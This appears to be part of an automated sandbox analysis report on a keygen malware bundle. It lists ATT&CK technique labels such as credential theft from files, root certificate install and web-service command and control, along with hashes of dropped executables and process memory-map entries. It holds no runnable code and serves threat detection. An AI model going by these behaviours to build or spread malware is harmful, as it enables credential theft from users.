                                                                                                                                                          Modify Registry

                                                                                                                                                          3
                                                                                                                                                          T1112

                                                                                                                                                          Install Root Certificate

                                                                                                                                                          1
                                                                                                                                                          T1130

                                                                                                                                                          Credential Access

                                                                                                                                                          Credentials in Files

                                                                                                                                                          4
                                                                                                                                                          T1081

                                                                                                                                                          Discovery

                                                                                                                                                          Query Registry

                                                                                                                                                          3
                                                                                                                                                          T1012

                                                                                                                                                          System Information Discovery

                                                                                                                                                          4
                                                                                                                                                          T1082

                                                                                                                                                          Remote System Discovery

                                                                                                                                                          1
                                                                                                                                                          T1018

                                                                                                                                                          Collection

                                                                                                                                                          Data from Local System

                                                                                                                                                          4
                                                                                                                                                          T1005

                                                                                                                                                          Command and Control

                                                                                                                                                          Web Service

                                                                                                                                                          1
                                                                                                                                                          T1102

                                                                                                                                                          Replay Monitor

                                                                                                                                                          Loading Replay Monitor...

                                                                                                                                                          Downloads

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
                                                                                                                                                            MD5

                                                                                                                                                            da2300f2a7deea5507c9a02bae877d76

                                                                                                                                                            SHA1

                                                                                                                                                            d5fccbb0cdbefa87b5a02e2155e3a6d8fe546565

                                                                                                                                                            SHA256

                                                                                                                                                            6f0fb7c35f5e427bfb96ae089423d98892fd5ed04b53f4926006e4512c8e3e32

                                                                                                                                                            SHA512

                                                                                                                                                            e8866a021d9e48c73b6d1d23178e94787a873b5b7e6712e7d8a45b25751459c364bbefc527e4ef923b4fa6c23bdee8f3a7d06c1fa371a5cf6b29566b98bb6d58

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                            MD5

                                                                                                                                                            65b49b106ec0f6cf61e7dc04c0a7eb74

                                                                                                                                                            SHA1

                                                                                                                                                            a1f4784377c53151167965e0ff225f5085ebd43b

                                                                                                                                                            SHA256

                                                                                                                                                            862a8cf0e5561c848145a1a1f464acf77f92a3b15cc43722a7208701f60a2fcd

                                                                                                                                                            SHA512

                                                                                                                                                            e9030cd609f42fb616e5bac3a5203ae46bbae9ec95682432a367f8805cdaa3e30c18a732ceddb0545ac653d543348a6728866149d2822752c80948066bfdf3da

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                            MD5

                                                                                                                                                            65b49b106ec0f6cf61e7dc04c0a7eb74

                                                                                                                                                            SHA1

                                                                                                                                                            a1f4784377c53151167965e0ff225f5085ebd43b

                                                                                                                                                            SHA256

                                                                                                                                                            862a8cf0e5561c848145a1a1f464acf77f92a3b15cc43722a7208701f60a2fcd

                                                                                                                                                            SHA512

                                                                                                                                                            e9030cd609f42fb616e5bac3a5203ae46bbae9ec95682432a367f8805cdaa3e30c18a732ceddb0545ac653d543348a6728866149d2822752c80948066bfdf3da

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                                            MD5

                                                                                                                                                            c615d0bfa727f494fee9ecb3f0acf563

                                                                                                                                                            SHA1

                                                                                                                                                            6c3509ae64abc299a7afa13552c4fe430071f087

                                                                                                                                                            SHA256

                                                                                                                                                            95d91febc45d03c1ee477c127bcbd332cd6fbce1e91105004af723594e6f0199

                                                                                                                                                            SHA512

                                                                                                                                                            d97256eb93d8e546f5fb5c61bebe61e7dfab316eb7685be83782bd36b28df3f80880e7b823197a4b6bae1af7b9460c4c81357dd44ed199ab93ccaee5acc10e51

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                                            MD5

                                                                                                                                                            c615d0bfa727f494fee9ecb3f0acf563

                                                                                                                                                            SHA1

                                                                                                                                                            6c3509ae64abc299a7afa13552c4fe430071f087

                                                                                                                                                            SHA256

                                                                                                                                                            95d91febc45d03c1ee477c127bcbd332cd6fbce1e91105004af723594e6f0199

                                                                                                                                                            SHA512

                                                                                                                                                            d97256eb93d8e546f5fb5c61bebe61e7dfab316eb7685be83782bd36b28df3f80880e7b823197a4b6bae1af7b9460c4c81357dd44ed199ab93ccaee5acc10e51

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat
                                                                                                                                                            MD5

                                                                                                                                                            a12e7acce9c54e8f477830c938cd5bb7

                                                                                                                                                            SHA1

                                                                                                                                                            482ac6ae9ea9ab1673e1444269bba2ef7a86794c

                                                                                                                                                            SHA256

                                                                                                                                                            b5433a43058d8b81958e13064f7d5485b787d6812513600c27b913dc5c3b3bd0

                                                                                                                                                            SHA512

                                                                                                                                                            5198b9b7f7ab17a0173a5eed18f3b1906ab3fc64da62cfb765ff43539acdcf3a0eafeefe6184f51f1fbebaacdb0bdf422572b4b3ba70de0b116c779f5e1b7174

                                                                                                                                                          • \??\pipe\crashpad_1640_FMEFDJNKKVJAWCBE
                                                                                                                                                            MD5

                                                                                                                                                            d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                            SHA1

                                                                                                                                                            da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                            SHA256

                                                                                                                                                            e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                            SHA512

                                                                                                                                                            cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                          • \Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                            MD5

                                                                                                                                                            65b49b106ec0f6cf61e7dc04c0a7eb74

                                                                                                                                                            SHA1

                                                                                                                                                            a1f4784377c53151167965e0ff225f5085ebd43b

                                                                                                                                                            SHA256

                                                                                                                                                            862a8cf0e5561c848145a1a1f464acf77f92a3b15cc43722a7208701f60a2fcd

                                                                                                                                                            SHA512

                                                                                                                                                            e9030cd609f42fb616e5bac3a5203ae46bbae9ec95682432a367f8805cdaa3e30c18a732ceddb0545ac653d543348a6728866149d2822752c80948066bfdf3da

                                                                                                                                                          • \Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                                            MD5

                                                                                                                                                            c615d0bfa727f494fee9ecb3f0acf563

                                                                                                                                                            SHA1

                                                                                                                                                            6c3509ae64abc299a7afa13552c4fe430071f087

                                                                                                                                                            SHA256

                                                                                                                                                            95d91febc45d03c1ee477c127bcbd332cd6fbce1e91105004af723594e6f0199

                                                                                                                                                            SHA512

                                                                                                                                                            d97256eb93d8e546f5fb5c61bebe61e7dfab316eb7685be83782bd36b28df3f80880e7b823197a4b6bae1af7b9460c4c81357dd44ed199ab93ccaee5acc10e51

                                                                                                                                                          • \Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                                            MD5

                                                                                                                                                            c615d0bfa727f494fee9ecb3f0acf563

                                                                                                                                                            SHA1

                                                                                                                                                            6c3509ae64abc299a7afa13552c4fe430071f087

                                                                                                                                                            SHA256

                                                                                                                                                            95d91febc45d03c1ee477c127bcbd332cd6fbce1e91105004af723594e6f0199

                                                                                                                                                            SHA512

                                                                                                                                                            d97256eb93d8e546f5fb5c61bebe61e7dfab316eb7685be83782bd36b28df3f80880e7b823197a4b6bae1af7b9460c4c81357dd44ed199ab93ccaee5acc10e51

                                                                                                                                                          • \Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                                                            MD5

                                                                                                                                                            60290ece1dd50638640f092e9c992fd9

                                                                                                                                                            SHA1

                                                                                                                                                            ed4c19916228dbbe3b48359a1da2bc2c78a0a162

                                                                                                                                                            SHA256

                                                                                                                                                            b2df7da266e778e98107f64e0155071ac9e07ded4f556c7d7a3071dd5fbf5e06

                                                                                                                                                            SHA512

                                                                                                                                                            928a2a951bb778b0d0a7ac681f66569bc9b707faf3878bf5f87b5b0ab117e34f6b846a5247bbb7aa2a086ecac8882b528a44be809e0900e177dae4b546dd32a4

                                                                                                                                                          • memory/324-114-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/524-202-0x0000000001E70000-0x0000000001E72000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            8KB

                                                                                                                                                          • memory/524-116-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/636-72-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/752-221-0x000000001B080000-0x000000001B082000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            8KB

                                                                                                                                                          • memory/844-209-0x0000000000BD0000-0x0000000000C37000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            412KB

                                                                                                                                                          • memory/844-208-0x0000000000110000-0x0000000000154000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            272KB

                                                                                                                                                          • memory/876-201-0x0000000000400000-0x0000000000983000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            5.5MB

                                                                                                                                                          • memory/880-217-0x0000000005D20000-0x0000000005D21000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/924-70-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/1016-195-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/1052-171-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/1056-199-0x0000000000E10000-0x0000000000FAC000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            1.6MB

                                                                                                                                                          • memory/1056-204-0x0000000002AE0000-0x0000000002BCF000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            956KB

                                                                                                                                                          • memory/1056-198-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/1056-215-0x0000000000150000-0x0000000000151000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/1056-216-0x0000000000130000-0x0000000000142000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            72KB

                                                                                                                                                          • memory/1136-180-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/1188-76-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/1228-179-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/1228-158-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/1232-59-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/1460-79-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/1476-83-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/1544-63-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/1628-140-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/1640-77-0x0000000006910000-0x0000000006911000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/1676-64-0x00000000773A0000-0x00000000773A1000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/1676-62-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/1676-214-0x0000000001ED0000-0x0000000001ED2000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            8KB

                                                                                                                                                          • memory/1688-169-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/1736-222-0x0000000000EC0000-0x0000000000EC1000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/1828-67-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/1920-192-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2060-163-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2068-119-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2072-223-0x0000000004A40000-0x0000000004A41000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/2076-112-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2136-86-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2160-110-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2176-175-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2184-122-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2184-165-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2188-181-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2212-164-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2216-183-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2236-212-0x00000000055D0000-0x0000000005661000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            580KB

                                                                                                                                                          • memory/2236-213-0x0000000000400000-0x0000000003DE9000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            57.9MB

                                                                                                                                                          • memory/2248-137-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2252-134-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2252-170-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2288-200-0x000000001B0E0000-0x000000001B0E2000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            8KB

                                                                                                                                                          • memory/2312-143-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2316-211-0x0000000000210000-0x0000000000277000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            412KB

                                                                                                                                                          • memory/2316-218-0x0000000002C20000-0x0000000002D26000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            1.0MB

                                                                                                                                                          • memory/2320-196-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2320-173-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2328-207-0x00000000004D0000-0x0000000000526000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            344KB

                                                                                                                                                          • memory/2328-206-0x0000000000230000-0x000000000026A000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            232KB

                                                                                                                                                          • memory/2328-172-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2420-146-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2424-161-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2424-203-0x0000000000400000-0x0000000000415000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            84KB

                                                                                                                                                          • memory/2440-89-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2576-187-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2616-174-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2616-197-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2652-149-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2752-205-0x00000000003D0000-0x00000000003D1000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/2780-92-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2788-177-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2792-155-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2800-152-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2808-176-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2836-95-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2872-178-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2896-125-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2928-98-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2948-128-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2960-166-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2976-101-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2980-168-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2980-182-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2984-167-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/2988-219-0x0000000000240000-0x000000000027C000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            240KB

                                                                                                                                                          • memory/2988-220-0x0000000000400000-0x0000000000464000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            400KB

                                                                                                                                                          • memory/3016-131-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/3024-104-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/3044-108-0x000007FEFBEC1000-0x000007FEFBEC3000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            8KB

                                                                                                                                                          • memory/3044-106-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/3060-107-0x0000000000000000-mapping.dmp
                                                                                                                                                          • memory/3104-224-0x0000000005000000-0x0000000005001000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/3104-226-0x0000000005001000-0x0000000005002000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/3104-228-0x0000000005006000-0x0000000005017000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            68KB

                                                                                                                                                          • memory/3156-227-0x00000000009D0000-0x00000000009D1000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/3168-225-0x0000000000470000-0x0000000000471000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/3284-231-0x0000000000400000-0x0000000000464000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            400KB

                                                                                                                                                          • memory/3636-229-0x00000000050B0000-0x00000000050B1000-memory.dmp
                                                                                                                                                            Filesize

                                                                                                                                                            4KB